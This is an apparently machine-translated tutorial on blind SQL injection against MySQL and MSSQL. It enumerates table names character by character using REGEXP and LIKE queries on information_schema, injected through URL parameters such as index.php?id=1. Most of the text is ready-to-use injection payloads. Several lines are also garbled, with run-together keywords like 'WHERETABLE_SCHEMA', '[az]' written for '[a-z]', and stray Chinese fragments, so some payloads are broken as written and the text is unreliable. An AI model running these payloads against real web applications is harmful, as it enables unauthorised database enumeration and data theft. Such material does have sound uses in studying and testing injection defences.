We all already know that all library name, table name and field name information are stored in the information_schema library in MYSQL 5+.
Therefore, the attack method is as follows:
1. Determine whether the first character of the first table name is a character in az, where blind_sqli is a known library name.
Note: ^[az] in the regular expression means that the starting character in the string is in the range of az
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1)/*
2. Determine whether the first character is the character in an
index.php?id=1and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*
3. Make sure the character is n
index.php?id=1and 1=(SELECT 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /*
4. Replace the expression as follows
expressionlike this: '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]'-> FALSE
At this time, it means that the table name is news. It is necessary to verify whether the regular expression is '^news$', but it is not necessary to directly judge that table_name = 'news'.
5. Next, guess the other tables (you only need to modify limit 1,1 -> limit 2,1 to blindly note the next table) This is wrong! ! !
When regexp matches, all items are matched. E.g:
There are multiple tables in the security database, users, email, etc.
select* from users where id=1 and 1=(select 1 from information_schema.tables wheretable_schema='security' and table_name regexp '^u[a-z]' limit 0,1);是正确的 select* from users where id=1 and 1=(select 1 from information_schema.tables wheretable_schema='security' and table_name regexp '^us[a-z]' limit 0,1);是正确的 select* from users where id=1 and 1=(select 1 from information_schema.tables wheretable_schema='security' and table_name regexp '^em[a-z]' limit 0,1);是正确的 select* from users where id=1 and 1=(select 1 from information_schema.tables wheretable_schema='security' and table_name regexp '^us[a-z]' limit 1,1);不正确 select* from users where id=1 and 1=(select 1 from information_schema.tables wheretable_schema='security' and table_name regexp '^em[a-z]' limit 1,1);不正确
Experiments show that: under limit 0,1, regexp will match all items. When we use regexp, we should pay attention that there may be multiple items, and we need to blast one character at the same time. Similar to items 1 and 2 above. At this time, limit 0,1 is for where table_schema='security' limit 0,1. table_schema='security' has already played a limiting role, and it is no longer important whether there is a limit.
-----------------------------------------------MSSQL---------------------------------------------------
The regular expression used by MSSQL is not a standard regular expression, the expression uses the like keyword
default.asp?id=1AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" and table_name LIKE '[a-z]%' )
In this query, select top 1 is a combination, don't read it wrong.
If you want to query other table names, because you can't use limit x,1 like mysql, you can only use
table_name not in (select top x table_name frominformation_schema.tables)
The meaning is: the table name is not in the first x rows, in fact, the query is the x+1 row.
For example, to query the table name of the second row:
default.asp?id=1AND 1=(SELECT TOP 1 1 FROM information_schema.tables WHERETABLE_SCHEMA="blind_sqli" and table_name NOT IN ( SELECT TOP 1table_name FROM information_schema.tables) and table_name LIKE '[a-z]%' )
The order of expressions:
'n[a-z]%'-> 'ne[a-z]%' -> 'new[a-z]%' -> 'news[a-z]%' -> TRUE
The reason why the expression news[az] returns correctly after querying is that % represents 0-n characters, and "_" can only represent one character. Therefore, to confirm whether there are any subsequent characters, use the following expression
'news%'TRUE -> 'news_' FALSE
Similarly, fields and values can be obtained in the same way. It will not be described in detail here.